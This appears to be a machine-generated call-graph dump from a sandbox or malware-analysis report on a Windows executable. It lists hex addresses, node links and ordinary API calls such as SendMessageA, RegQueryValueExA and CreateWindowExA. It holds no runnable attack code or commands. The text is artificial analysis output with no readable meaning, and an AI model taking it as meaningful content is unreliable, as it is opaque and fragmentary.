46ac4b 51091->51095 51092->51091 51093 46a842 51092->51093 51096 403494 4 API calls 51092->51096 51099 46a863 51093->51099 51100 46a8a4 51093->51100 51097 403494 4 API calls 51094->51097 51098 403494 4 API calls 51095->51098 51102 46a7c6 51096->51102 51103 46ac28 51097->51103 51104 46ac59 51098->51104 51101 403494 4 API calls 51099->51101 51108 403400 4 API calls 51100->51108 51105 46a871 51101->51105 51106 414ae8 18 API calls 51102->51106 51202 46915c 26 API calls 51103->51202 51203 46915c 26 API calls 51104->51203 51110 414ae8 18 API calls 51105->51110 51111 46a7e7 51106->51111 51112 46a8a2 51108->51112 51114 46a892 51110->51114 51176 403634 51111->51176 51132 46a988 51112->51132 51182 469868 51112->51182 51113 46ac36 51116 403400 4 API calls 51113->51116 51117 403634 18 API calls 51114->51117 51120 46ac7c 51116->51120 51117->51112 51125 403400 4 API calls 51120->51125 51121 46aa10 51123 403400 4 API calls 51121->51123 51128 46aa0e 51123->51128 51124 46a8c4 51129 46a902 51124->51129 51130 46a8ca 51124->51130 51126 46ac84 51125->51126 51131 403420 4 API calls 51126->51131 51197 469ca4 57 API calls 51128->51197 51133 403400 4 API calls 51129->51133 51134 403494 4 API calls 51130->51134 51136 46ac91 51131->51136 51132->51121 51137 46a9cf 51132->51137 51138 46a900 51133->51138 51135 46a8d8 51134->51135 51188 47c26c 51135->51188 51136->50557 51142 403494 4 API calls 51137->51142 51191 469b5c 51138->51191 51146 46a9dd 51142->51146 51144 46aa39 51152 46aa44 51144->51152 51153 46aa9a 51144->51153 51145 46a8f0 51148 403634 18 API calls 51145->51148 51149 414ae8 18 API calls 51146->51149 51148->51138 51151 46a9fe 51149->51151 51154 403634 18 API calls 51151->51154 51156 403494 4 API calls 51152->51156 51155 403400 4 API calls 51153->51155 51154->51128 51162 46aaa2 51155->51162 51164 46aa52 51156->51164 51157 46a929 51158 46a934 51157->51158 51159 46a98a 51157->51159 51161 403494 4 API calls 51158->51161 51160 403400 4 API calls 51159->51160 51160->51132 51166 46a942 51161->51166 51174 46ab4b 51162->51174 51198 494c90 18 API calls 51162->51198 51164->51162 51168 403634 18 API calls 51164->51168 51170 46aa98 51164->51170 51165 46aac5 51165->51174 51199 494f3c 32 API calls 51165->51199 51166->51132 51169 403634 18 API calls 51166->51169 51168->51164 51169->51166 51170->51162 51172 46abec 51201 429144 SendMessageA SendMessageA 51172->51201 51200 4290f4 SendMessageA 51174->51200 51175->50558 51177 40363c 51176->51177 51178 4034bc 18 API calls 51177->51178 51179 40364f 51178->51179 51180 403450 18 API calls 51179->51180 51181 403677 51180->51181 51204 42a040 SendMessageA 51182->51204 51184 469877 51185 469897 51184->51185 51205 42a040 SendMessageA 51184->51205 51185->51124 51187 469887 51187->51124 51206 47c2b4 51188->51206 51195 469b89 51191->51195 51192 469beb 51193 403400 4 API calls 51192->51193 51194 469c00 51193->51194 51194->51157 51195->51192 51551 469ae0 57 API calls 51195->51551 51197->51144 51198->51165 51199->51174 51200->51172 51201->51091 51202->51113 51203->51113 51204->51184 51205->51187 51207 403494 4 API calls 51206->51207 51214 47c2e7 51207->51214 51208 47c3f9 51209 403420 4 API calls 51208->51209 51210 47c289 51209->51210 51210->51145 51212 403778 18 API calls 51212->51214 51214->51208 51214->51212 51217 4037b8 18 API calls 51214->51217 51218 47b100 51214->51218 51462 453344 18 API calls 51214->51462 51463 403800 51214->51463 51467 42c97c CharPrevA 51214->51467 51217->51214 51219 47b152 51218->51219 51220 47b130 51218->51220 51221 47b172 51219->51221 51222 47b160 51219->51222 51220->51219 51472 47a030 33 API calls 51220->51472 51225 47b1d5 51221->51225 51226 47b180 51221->51226 51223 403494 4 API calls 51222->51223 51277 47b16d 51223->51277 51235 47b1f6 51225->51235 51236 47b1e3 51225->51236 51228 47b1af 51226->51228 51229 47b189 51226->51229 51227 403400 4 API calls 51230 47baf8 51227->51230 51232 47b1c2 51228->51232 51474 453344 18 API calls 51228->51474 51231 47b19c 51229->51231 51473 453344 18 API calls 51229->51473 51234 403400 4 API calls 51230->51234 51238 403494 4 API calls 51231->51238 51233 403494 4 API calls 51232->51233 51233->51277 51240 47bb00 51234->51240 51242 47b217 51235->51242 51243 47b204 51235->51243 51241 403494 4 API calls 51236->51241 51238->51277 51240->51214 51241->51277 51245 47b267 51242->51245 51246 47b225 51242->51246 51244 403494 4 API calls 51243->51244 51244->51277 51253 47b275 51245->51253 51254 47b288 51245->51254 51247 47b241 51246->51247 51248 47b22e 51246->51248 51250 47b254 51247->51250 51475 453344 18 API calls 51247->51475 51249 403494 4 API calls 51248->51249 51249->51277 51252 403494 4 API calls 51250->51252 51252->51277 51255 403494 4 API calls 51253->51255 51256 47b296 51254->51256 51257 47b2a9 51254->51257 51255->51277 51258 403494 4 API calls 51256->51258 51259 47b2b7 51257->51259 51260 47b2ca 51257->51260 51258->51277 51261 403494 4 API calls 51259->51261 51262 47b2eb 51260->51262 51263 47b2d8 51260->51263 51261->51277 51265 47b327 51262->51265 51266 47b2f9 51262->51266 51264 403494 4 API calls 51263->51264 51264->51277 51271 47b335 51265->51271 51276 47b364 51265->51276 51267 47b315 51266->51267 51268 47b302 51266->51268 51270 47c26c 57 API calls 51267->51270 51269 403494 4 API calls 51268->51269 51269->51277 51270->51277 51272 47b351 51271->51272 51273 47b33e 51271->51273 51275 403494 4 API calls 51272->51275 51274 403494 4 API calls 51273->51274 51274->51277 51275->51277 51278 47b372 51276->51278 51279 47b3a0 51276->51279 51277->51227 51280 47b38e 51278->51280 51281 47b37b 51278->51281 51284 47b3ae 51279->51284 51285 47b3dd 51279->51285 51462->51214 51464 40382f 51463->51464 51465 403804 51463->51465 51464->51214 51466 4038a4 18 API calls 51465->51466 51466->51464 51467->51214 51472->51220 51473->51231 51474->51232 51475->51250 51551->51195 51553 47dd56 51552->51553 51554 47dd19 51552->51554 51553->50564 51584 455d0c 51554->51584 51558 47dd6d 51558->50564 51703 466714 51559->51703 51562->50572 51564 42f56c 51563->51564 51565 42f58f GetActiveWindow GetFocus 51564->51565 51566 41eea4 2 API calls 51565->51566 51567 42f5a6 51566->51567 51568 42f5c3 51567->51568 51569 42f5b3 RegisterClassA 51567->51569 51570 42f652 SetFocus 51568->51570 51571 42f5d1 CreateWindowExA 51568->51571 51569->51568 51572 403400 4 API calls 51570->51572 51571->51570 51573 42f604 51571->51573 51574 42f66e 51572->51574 51734 42427c 51573->51734 51579 494f3c 32 API calls 51574->51579 51576 42f62c 51577 42f634 CreateWindowExA 51576->51577 51577->51570 51578 42f64a ShowWindow 51577->51578 51578->51570 51579->50610 51740 44b514 51580->51740 51585 455d1d 51584->51585 51586 455d21 51585->51586 51587 455d2a 51585->51587 51610 455a10 51586->51610 51618 455af0 43 API calls 51587->51618 51590 455d27 51590->51553 51591 47d970 51590->51591 51596 47da6c 51591->51596 51598 47d9b0 51591->51598 51592 403420 4 API calls 51593 47db4f 51592->51593 51593->51558 51603 47dabd 51596->51603 51606 47da0f 51596->51606 51673 479630 51596->51673 51598->51596 51599 47da18 51598->51599 51602 47c26c 57 API calls 51598->51602 51598->51606 51647 479770 51598->51647 51658 4798d4 51598->51658 51599->51598 51604 47c26c 57 API calls 51599->51604 51609 47da59 51599->51609 51662 42c92c 51599->51662 51667 42c954 51599->51667 51672 47d67c 66 API calls 51599->51672 51600 47c26c 57 API calls 51600->51603 51601 454100 34 API calls 51601->51603 51602->51598 51603->51596 51603->51600 51603->51601 51603->51609 51604->51599 51606->51592 51609->51606 51619 42de1c 51610->51619 51612 455a2d 51613 455a7b 51612->51613 51622 455944 51612->51622 51613->51590 51616 455944 20 API calls 51617 455a5c RegCloseKey 51616->51617 51617->51590 51618->51590 51620 42de27 51619->51620 51621 42de2d RegOpenKeyExA 51619->51621 51620->51621 51621->51612 51627 42dd58 51622->51627 51624 403420 4 API calls 51625 4559f6 51624->51625 51625->51616 51626 45596c 51626->51624 51630 42dc00 51627->51630 51631 42dc26 RegQueryValueExA 51630->51631 51636 42dc49 51631->51636 51646 42dc6b 51631->51646 51632 403400 4 API calls 51634 42dd37 51632->51634 51633 42dc63 51635 403400 4 API calls 51633->51635 51634->51626 51635->51646 51636->51633 51637 4034e0 18 API calls 51636->51637 51638 403744 18 API calls 51636->51638 51636->51646 51637->51636 51639 42dca0 RegQueryValueExA 51638->51639 51639->51631 51640 42dcbc 51639->51640 51641 4038a4 18 API calls 51640->51641 51640->51646 51642 42dcfe 51641->51642 51643 42dd10 51642->51643 51645 403744 18 API calls 51642->51645 51644 403450 18 API calls 51643->51644 51644->51646 51645->51643 51646->51632 51648 479786 51647->51648 51649 479782 51647->51649 51650 403450 18 API calls 51648->51650 51649->51598 51651 479793 51650->51651 51652 4797b3 51651->51652 51653 479799 51651->51653 51655 479630 33 API calls 51652->51655 51654 479630 33 API calls 51653->51654 51656 4797af 51654->51656 51655->51656 51657 403400 4 API calls 51656->51657 51657->51649 51659 4798e0 51658->51659 51660 4798fb 51659->51660 51685 453344 18 API calls 51659->51685 51660->51598 51686 42c79c 51662->51686 51665 403778 18 API calls 51666 42c94e 51665->51666 51666->51599 51668 42c79c IsDBCSLeadByte 51667->51668 51669 42c964 51668->51669 51670 403778 18 API calls 51669->51670 51671 42c975 51670->51671 51671->51599 51672->51599 51674 47964b 51673->51674 51677 47967c 51674->51677 51684 47970a 51674->51684 51698 4794e4 33 API calls 51674->51698 51675 4796a1 51680 4796c2 51675->51680 51700 4794e4 33 API calls 51675->51700 51677->51675 51699 4794e4 33 API calls 51677->51699 51681 479702 51680->51681 51680->51684 51701 453344 18 API calls 51680->51701 51692 479368 51681->51692 51684->51596 51685->51660 51687 42c67c IsDBCSLeadByte 51686->51687 51689 42c7b1 51687->51689 51688 42c7fb 51688->51665 51689->51688 51691 42c444 IsDBCSLeadByte 51689->51691 51691->51689 51693 4793a3 51692->51693 51694 403450 18 API calls 51693->51694 51695 4793c8 51694->51695 51702 477a58 33 API calls 51695->51702 51697 479409 51697->51684 51698->51677 51699->51675 51700->51680 51701->51681 51702->51697 51704 403494 4 API calls 51703->51704 51705 466742 51704->51705 51720 42dbc8 51705->51720 51708 42dbc8 19 API calls 51709 466766 51708->51709 51710 466600 33 API calls 51709->51710 51711 466770 51710->51711 51712 42dbc8 19 API calls 51711->51712 51713 46677f 51712->51713 51723 466678 51713->51723 51716 42dbc8 19 API calls 51717 466798 51716->51717 51718 403400 4 API calls 51717->51718 51719 4667ad 51718->51719 51719->50568 51727 42db10 51720->51727 51724 466698 51723->51724 51725 4078f4 33 API calls 51724->51725 51726 4666e2 51725->51726 51726->51716 51728 42db30 51727->51728 51729 42dbbb 51727->51729 51728->51729 51730 4037b8 18 API calls 51728->51730 51732 403800 18 API calls 51728->51732 51733 42c444 IsDBCSLeadByte 51728->51733 51729->51708 51730->51728 51732->51728 51733->51728 51735 4242ae 51734->51735 51736 42428e GetWindowTextA 51734->51736 51738 403494 4 API calls 51735->51738 51737 4034e0 18 API calls 51736->51737 51739 4242ac 51737->51739 51738->51739 51739->51576 51743 44b38c 51740->51743 51744 44b3bf 51743->51744 51745 414ae8 18 API calls 51744->51745 51746 44b3d2 51745->51746 51747 44b3ff GetDC 51746->51747 51748 40357c 18 API calls 51746->51748 51749 41a1e8 19 API calls 51747->51749 51748->51747 51750 44b41f SelectObject 51749->51750 51751 44b430 51750->51751 51754 44b0c0 51751->51754 51755 44b0d7 51754->51755 51756 44b16a 51755->51756 51757 44b153 51755->51757 51758 44b0ea 51755->51758 51758->51756 51768 4652d7 51765->51768 51766 4653b2 51776 46708c 51766->51776 51767 46536a 51767->51766 51794 4185b8 21 API calls 51767->51794 51768->51766 51771 465327 51768->51771 51788 421a1c 51768->51788 51771->51767 51772 465361 51771->51772 51773 46536c 51771->51773 51774 421a1c 21 API calls 51772->51774 51775 421a1c 21 API calls 51773->51775 51774->51767 51775->51767 51777 4670bc 51776->51777 51778 46709d 51776->51778 51777->50629 51779 414b18 18 API calls 51778->51779 51780 4670ab 51779->51780 51781 414b18 18 API calls 51780->51781 51781->51777 51789 421a74 51788->51789 51791 421a2a 51788->51791 51789->51771 51790 421a59 51790->51789 51795 421d28 SetFocus GetFocus 51790->51795 51791->51790 51792 408cbc 19 API calls 51791->51792 51792->51790 51794->51766 51795->51789 51844 46c7a5 51843->51844 51845 414ae8 18 API calls 51844->51845 51860 46c7f2 51844->51860 51846 46c7bb 51845->51846 52050 466924 20 API calls 51846->52050 51847 403420 4 API calls 51849 46c89c 51847->51849 51849->50709 52042 408be0 19 API calls 51849->52042 51850 46c7c3 51851 414b18 18 API calls 51850->51851 51852 46c7d1 51851->51852 51853 46c7de 51852->51853 51855 46c7f7 51852->51855 52051 47efd0 56 API calls 51853->52051 51856 46c80f 51855->51856 51858 466a08 CharNextA 51855->51858 52052 47efd0 56 API calls 51856->52052 51859 46c80b 51858->51859 51859->51856 51861 46c825 51859->51861 51860->51847 51862 46c841 51861->51862 51863 46c82b 51861->51863 51865 42c99c CharNextA 51862->51865 52053 47efd0 56 API calls 51863->52053 51866 46c84e 51865->51866 51866->51860 52054 466a94 18 API calls 51866->52054 51868 46c865 51869 451458 18 API calls 51868->51869 51870 46c872 51869->51870 52055 47efd0 56 API calls 51870->52055 51873 4241ed SetActiveWindow 51872->51873 51877 424223 51872->51877 52056 42364c 51873->52056 51877->50721 51877->50722 51878 42420a 51878->51877 51879 42421d SetFocus 51878->51879 51879->51877 51881 482505 51880->51881 51882 4824d7 51880->51882 51884 475bd0 51881->51884 52069 494cec 32 API calls 51882->52069 52070 457d10 51884->52070 52043->50717 52050->51850 52051->51860 52052->51860 52053->51860 52054->51868 52055->51860 52065 4235f8 SystemParametersInfoA 52056->52065 52059 423665 ShowWindow 52061 423670 52059->52061 52062 423677 52059->52062 52068 423628 SystemParametersInfoA 52061->52068 52064 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52062->52064 52064->51878 52066 423616 52065->52066 52066->52059 52067 423628 SystemParametersInfoA 52066->52067 52067->52059 52068->52062 52069->51881 52071 457e44 52070->52071 52072 457d3c 52070->52072 52073 457e95 52071->52073 52546 45757c 20 API calls 52071->52546 52542 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52072->52542 52076 403400 4 API calls 52073->52076 52078 457eaa 52076->52078 52077 457d44 52079 4078f4 33 API calls 52077->52079 52091 4072a8 52078->52091 52080 457db5 52079->52080 52543 457d00 34 API calls 52080->52543 52086 457dbd 52092 403738 52091->52092 52093 4072b2 SetCurrentDirectoryA 52092->52093 52542->52077 52543->52086 52546->52073 53743 431eec 53704->53743 53706 43d9f2 53707 403400 4 API calls 53706->53707 53708 43da76 53707->53708 53708->50778 53708->50779 53710 431bd6 53709->53710 53711 402648 18 API calls 53710->53711 53712 431c06 53711->53712 53713 4947f8 53712->53713 53714 4948cd 53713->53714 53715 494812 53713->53715 53720 494910 53714->53720 53715->53714 53717 433d6c 18 API calls 53715->53717 53719 403450 18 API calls 53715->53719 53748 408c0c 18 API calls 53715->53748 53749 431ca0 53715->53749 53717->53715 53719->53715 53721 49492c 53720->53721 53757 433d6c 53721->53757 53723 494931 53724 431ca0 18 API calls 53723->53724 53725 49493c 53724->53725 53726 43d594 53725->53726 53727 43d5c1 53726->53727 53728 43d5b3 53726->53728 53727->50789 53728->53727 53729 43d63d 53728->53729 53733 447084 18 API calls 53728->53733 53736 43d6f7 53729->53736 53760 447084 53729->53760 53731 43d688 53766 43dd50 53731->53766 53733->53728 53734 43d8fd 53734->53727 53786 447024 18 API calls 53734->53786 53736->53734 53737 43d8de 53736->53737 53784 447024 18 API calls 53736->53784 53785 447024 18 API calls 53737->53785 53740->50791 53741->50793 53742->50780 53744 403494 4 API calls 53743->53744 53746 431efb 53744->53746 53745 431f25 53745->53706 53746->53745 53747 403744 18 API calls 53746->53747 53747->53746 53748->53715 53750 431cc0 53749->53750 53751 431cae 53749->53751 53753 431ce2 53750->53753 53756 431c40 18 API calls 53750->53756 53755 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53751->53755 53753->53715 53755->53750 53756->53753 53758 402648 18 API calls 53757->53758 53759 433d7b 53758->53759 53759->53723 53761 4470a3 53760->53761 53762 4470aa 53760->53762 53787 446e30 18 API calls 53761->53787 53764 431ca0 18 API calls 53762->53764 53765 4470ba 53764->53765 53765->53731 53767 43dd6c 53766->53767 53772 43dd99 53766->53772 53768 402660 4 API calls 53767->53768 53767->53772 53768->53767 53769 43ddce 53769->53736 53771 43fea5 53771->53769 53797 447024 18 API calls 53771->53797 53772->53769 53772->53771 53773 43c938 18 API calls 53772->53773 53774 447024 18 API calls 53772->53774 53776 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53776 53779 446e30 18 API calls 53772->53779 53781 433d18 18 API calls 53772->53781 53782 436650 18 API calls 53772->53782 53783 431c40 18 API calls 53772->53783 53788 4396e0 53772->53788 53794 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53794 53795 43dc48 32 API calls 53772->53795 53796 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53772->53796 53773->53772 53774->53772 53776->53772 53779->53772 53781->53772 53782->53772 53783->53772 53784->53736 53785->53734 53786->53734 53787->53762 53789 4396e9 53788->53789 53794->53772 53795->53772 53796->53772 53797->53771 53800 41fb58 53801 41fb61 53800->53801 53804 41fdfc 53801->53804 53803 41fb6e 53805 41feee 53804->53805 53806 41fe13 53804->53806 53805->53803 53806->53805 53825 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53806->53825 53808 41fe49 53809 41fe73 53808->53809 53810 41fe4d 53808->53810 53835 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53809->53835 53826 41fb9c 53810->53826 53814 41fe81 53816 41fe85 53814->53816 53817 41feab 53814->53817 53815 41fb9c 10 API calls 53824 41fe71 53815->53824 53818 41fb9c 10 API calls 53816->53818 53819 41fb9c 10 API calls 53817->53819 53820 41fe97 53818->53820 53821 41febd 53819->53821 53823 41fb9c 10 API calls 53820->53823 53822 41fb9c 10 API calls 53821->53822 53822->53824 53823->53824 53824->53803 53825->53808 53827 41fbb7 53826->53827 53828 41fbcd 53827->53828 53829 41f93c 4 API calls 53827->53829 53836 41f93c 53828->53836 53829->53828 53831 41fc15 53832 41fc38 SetScrollInfo 53831->53832 53844 41fa9c 53832->53844 53835->53814 53837 4181e0 53836->53837 53838 41f959 GetWindowLongA 53837->53838 53839 41f996 53838->53839 53840 41f976 53838->53840 53856 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53839->53856 53855 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53840->53855 53843 41f982 53843->53831 53845 41faaa 53844->53845 53846 41fab2 53844->53846 53845->53815 53847 41faf1 53846->53847 53848 41fae1 53846->53848 53854 41faef 53846->53854 53858 417e48 IsWindowVisible ScrollWindow SetWindowPos 53847->53858 53857 417e48 IsWindowVisible ScrollWindow SetWindowPos 53848->53857 53849 41fb31 GetScrollPos 53849->53845 53852 41fb3c 53849->53852 53853 41fb4b SetScrollPos 53852->53853 53853->53845 53854->53849 53855->53843 53856->53843 53857->53854 53858->53854 53859 420598 53860 4205ab 53859->53860 53880 415b30 53860->53880 53862 4206f2 53863 420709 53862->53863 53887 4146d4 KiUserCallbackDispatcher 53862->53887 53867 420720 53863->53867 53888 414718 KiUserCallbackDispatcher 53863->53888 53864 420651 53885 420848 34 API calls 53864->53885 53865 4205e6 53865->53862 53865->53864 53873 420642 MulDiv 53865->53873 53869 420742 53867->53869 53889 420060 12 API calls 53867->53889 53871 42066a 53871->53862 53886 420060 12 API calls 53871->53886 53884 41a304 19 API calls 53873->53884 53876 420687 53877 4206a3 MulDiv 53876->53877 53878 4206c6 53876->53878 53877->53878 53878->53862 53879 4206cf MulDiv 53878->53879 53879->53862 53881 415b42 53880->53881 53890 414470 53881->53890 53883 415b5a 53883->53865 53884->53864 53885->53871 53886->53876 53887->53863 53888->53867 53889->53869 53891 41448a 53890->53891 53894 410458 53891->53894 53893 4144a0 53893->53883 53897 40dca4 53894->53897 53896 41045e 53896->53893 53898 40dd06 53897->53898 53899 40dcb7 53897->53899 53904 40dd14 53898->53904 53902 40dd14 33 API calls 53899->53902 53903 40dce1 53902->53903 53903->53896 53905 40dd24 53904->53905 53907 40dd3a 53905->53907 53916 40e09c 53905->53916 53932 40d5e0 53905->53932 53935 40df4c 53907->53935 53910 40d5e0 19 API calls 53911 40dd42 53910->53911 53911->53910 53912 40ddae 53911->53912 53938 40db60 53911->53938 53913 40df4c 19 API calls 53912->53913 53915 40dd10 53913->53915 53915->53896 53952 40e96c 53916->53952 53918 403778 18 API calls 53920 40e0d7 53918->53920 53919 40e18d 53921 40e1b7 53919->53921 53922 40e1a8 53919->53922 53920->53918 53920->53919 54015 40d774 19 API calls 53920->54015 54016 40e080 19 API calls 53920->54016 54012 40ba24 53921->54012 53961 40e3c0 53922->53961 53928 40e1b5 53929 403400 4 API calls 53928->53929 53930 40e25c 53929->53930 53930->53905 53933 40ea08 19 API calls 53932->53933 53934 40d5ea 53933->53934 53934->53905 54049 40d4bc 53935->54049 54058 40df54 53938->54058 53941 40e96c 19 API calls 53942 40db9e 53941->53942 53943 40e96c 19 API calls 53942->53943 53944 40dba9 53943->53944 53945 40dbc4 53944->53945 53946 40dbbb 53944->53946 53951 40dbc1 53944->53951 54065 40d9d8 53945->54065 54068 40dac8 33 API calls 53946->54068 53949 403420 4 API calls 53950 40dc8f 53949->53950 53950->53911 53951->53949 54018 40d780 53952->54018 53955 4034e0 18 API calls 53956 40e98f 53955->53956 53957 403744 18 API calls 53956->53957 53958 40e996 53957->53958 53959 40d780 19 API calls 53958->53959 53960 40e9a4 53959->53960 53960->53920 53962 40e3ec 53961->53962 53964 40e3f6 53961->53964 54023 40d440 19 API calls 53962->54023 53965 40e511 53964->53965 53966 40e495 53964->53966 53967 40e4f6 53964->53967 53968 40e576 53964->53968 53969 40e438 53964->53969 53970 40e4d9 53964->53970 53971 40e47a 53964->53971 53972 40e4bb 53964->53972 53983 40e45c 53964->53983 53975 40d764 19 API calls 53965->53975 54031 40de24 19 API calls 53966->54031 54036 40e890 19 API calls 53967->54036 53979 40d764 19 API calls 53968->53979 54024 40d764 53969->54024 54034 40e9a8 19 API calls 53970->54034 54030 40d818 19 API calls 53971->54030 54033 40dde4 19 API calls 53972->54033 53984 40e519 53975->53984 53978 403400 4 API calls 53985 40e5eb 53978->53985 53986 40e57e 53979->53986 53982 40e4a0 54032 40d470 19 API calls 53982->54032 53983->53978 53992 40e523 53984->53992 53993 40e51d 53984->53993 53985->53928 53994 40e582 53986->53994 53995 40e59b 53986->53995 53987 40e4e4 54035 409d38 18 API calls 53987->54035 53989 40e461 54029 40ded8 19 API calls 53989->54029 53990 40e444 54027 40de24 19 API calls 53990->54027 54037 40ea08 53992->54037 54000 40e521 53993->54000 54001 40e53c 53993->54001 54003 40ea08 19 API calls 53994->54003 54043 40de24 19 API calls 53995->54043 54041 40de24 19 API calls 54000->54041 54004 40ea08 19 API calls 54001->54004 54003->53983 54006 40e544 54004->54006 54005 40e44f 54028 40e26c 19 API calls 54005->54028 54040 40d8a0 19 API calls 54006->54040 54009 40e566 54042 40e2d4 18 API calls 54009->54042 54044 40b9d0 54012->54044 54015->53920 54016->53920 54017 40d774 19 API calls 54017->53928 54021 40d78b 54018->54021 54019 40d7c5 54019->53955 54021->54019 54022 40d7cc 19 API calls 54021->54022 54022->54021 54023->53964 54025 40ea08 19 API calls 54024->54025 54026 40d76e 54025->54026 54026->53989 54026->53990 54027->54005 54028->53983 54029->53983 54030->53983 54031->53982 54032->53983 54033->53983 54034->53987 54035->53983 54036->53983 54038 40d780 19 API calls 54037->54038 54039 40ea15 54038->54039 54039->53983 54040->53983 54041->54009 54042->53983 54043->53983 54045 40b9e2 54044->54045 54047 40ba07 54044->54047 54045->54047 54048 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54045->54048 54047->53928 54047->54017 54048->54047 54050 40ea08 19 API calls 54049->54050 54052 40d4c9 54050->54052 54051 40d4dc 54051->53911 54052->54051 54056 40eb0c 19 API calls 54052->54056 54054 40d4d7 54057 40d458 19 API calls 54054->54057 54056->54054 54057->54051 54059 40d764 19 API calls 54058->54059 54060 40df6b 54059->54060 54061 40ea08 19 API calls 54060->54061 54064 40db93 54060->54064 54062 40df78 54061->54062 54062->54064 54069 40ded8 19 API calls 54062->54069 54064->53941 54070 40ab7c 33 API calls 54065->54070 54067 40da00 54067->53951 54068->53951 54069->54064 54070->54067 56271 41363c SetWindowLongA GetWindowLongA 56272 413699 SetPropA SetPropA 56271->56272 56273 41367b GetWindowLongA 56271->56273 56278 41f39c 56272->56278 56273->56272 56274 41368a SetWindowLongA 56273->56274 56274->56272 56283 415270 56278->56283 56290 423c0c 56278->56290 56384 423a84 56278->56384 56279 4136e9 56284 41527d 56283->56284 56285 4152e3 56284->56285 56286 4152d8 56284->56286 56289 4152e1 56284->56289 56391 424b8c 13 API calls 56285->56391 56286->56289 56392 41505c 60 API calls 56286->56392 56289->56279 56293 423c42 56290->56293 56309 423c63 56293->56309 56393 423b68 56293->56393 56294 423cec 56296 423cf3 56294->56296 56297 423d27 56294->56297 56295 423c8d 56298 423c93 56295->56298 56299 423d50 56295->56299 56304 423cf9 56296->56304 56342 423fb1 56296->56342 56300 423d32 56297->56300 56301 42409a IsIconic 56297->56301 56305 423cc5 56298->56305 56306 423c98 56298->56306 56302 423d62 56299->56302 56303 423d6b 56299->56303 56307 4240d6 56300->56307 56308 423d3b 56300->56308 56301->56309 56313 4240ae GetFocus 56301->56313 56310 423d78 56302->56310 56311 423d69 56302->56311 56400 424194 11 API calls 56303->56400 56314 423f13 SendMessageA 56304->56314 56315 423d07 56304->56315 56305->56309 56333 423cde 56305->56333 56334 423e3f 56305->56334 56316 423df6 56306->56316 56317 423c9e 56306->56317 56414 424850 WinHelpA PostMessageA 56307->56414 56319 4240ed 56308->56319 56343 423cc0 56308->56343 56309->56279 56320 4241dc 11 API calls 56310->56320 56401 423b84 NtdllDefWindowProc_A 56311->56401 56313->56309 56321 4240bf 56313->56321 56314->56309 56315->56309 56315->56343 56364 423f56 56315->56364 56405 423b84 NtdllDefWindowProc_A 56316->56405 56322 423ca7 56317->56322 56323 423e1e PostMessageA 56317->56323 56331 4240f6 56319->56331 56332 42410b 56319->56332 56320->56309 56413 41eff4 GetCurrentThreadId EnumThreadWindows 56321->56413 56328 423cb0 56322->56328 56329 423ea5 56322->56329 56406 423b84 NtdllDefWindowProc_A 56323->56406 56337 423cb9 56328->56337 56338 423dce IsIconic 56328->56338 56339 423eae 56329->56339 56340 423edf 56329->56340 56330 423e39 56330->56309 56341 4244d4 19 API calls 56331->56341 56415 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56332->56415 56333->56343 56344 423e0b 56333->56344 56397 423b84 NtdllDefWindowProc_A 56334->56397 56336 4240c6 56336->56309 56348 4240ce SetFocus 56336->56348 56337->56343 56349 423d91 56337->56349 56351 423dea 56338->56351 56352 423dde 56338->56352 56408 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56339->56408 56398 423b84 NtdllDefWindowProc_A 56340->56398 56341->56309 56342->56309 56358 423fd7 IsWindowEnabled 56342->56358 56343->56309 56399 423b84 NtdllDefWindowProc_A 56343->56399 56346 424178 26 API calls 56344->56346 56346->56309 56347 423e45 56355 423e83 56347->56355 56356 423e61 56347->56356 56348->56309 56349->56309 56402 422c4c ShowWindow PostMessageA PostQuitMessage 56349->56402 56404 423b84 NtdllDefWindowProc_A 56351->56404 56403 423bc0 29 API calls 56352->56403 56365 423a84 6 API calls 56355->56365 56407 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56356->56407 56357 423eb6 56367 423ec8 56357->56367 56374 41ef58 6 API calls 56357->56374 56358->56309 56368 423fe5 56358->56368 56361 423ee5 56362 423efd 56361->56362 56369 41eea4 2 API calls 56361->56369 56370 423a84 6 API calls 56362->56370 56364->56309 56372 423f78 IsWindowEnabled 56364->56372 56373 423e8b PostMessageA 56365->56373 56409 423b84 NtdllDefWindowProc_A 56367->56409 56377 423fec IsWindowVisible 56368->56377 56369->56362 56370->56309 56371 423e69 PostMessageA 56371->56309 56372->56309 56376 423f86 56372->56376 56373->56309 56374->56367 56410 412310 21 API calls 56376->56410 56377->56309 56379 423ffa GetFocus 56377->56379 56380 4181e0 56379->56380 56381 42400f SetFocus 56380->56381 56411 415240 56381->56411 56385 423b0d 56384->56385 56386 423a94 56384->56386 56385->56279 56386->56385 56387 423a9a EnumWindows 56386->56387 56387->56385 56388 423ab6 GetWindow GetWindowLongA 56387->56388 56416 423a1c GetWindow 56387->56416 56389 423ad5 56388->56389 56389->56385 56390 423b01 SetWindowPos 56389->56390 56390->56385 56390->56389 56391->56289 56392->56289 56394 423b72 56393->56394 56395 423b7d 56393->56395 56394->56395 56396 408720 21 API calls 56394->56396 56395->56294 56395->56295 56396->56395 56397->56347 56398->56361 56399->56309 56400->56309 56401->56309 56402->56309 56403->56309 56404->56309 56405->56309 56406->56330 56407->56371 56408->56357 56409->56309 56410->56309 56412 41525b SetFocus 56411->56412 56412->56309 56413->56336 56414->56330 56415->56330 56417 423a3d GetWindowLongA 56416->56417 56418 423a49 56416->56418 56417->56418 56419 4809f7 56420 480a00 56419->56420 56422 480a2b 56419->56422 56421 480a1d 56420->56421 56420->56422 56791 476c50 203 API calls 56421->56791 56423 480a6a 56422->56423 56793 47f4a4 18 API calls 56422->56793 56424 480a8e 56423->56424 56427 480a81 56423->56427 56428 480a83 56423->56428 56433 480aca 56424->56433 56434 480aac 56424->56434 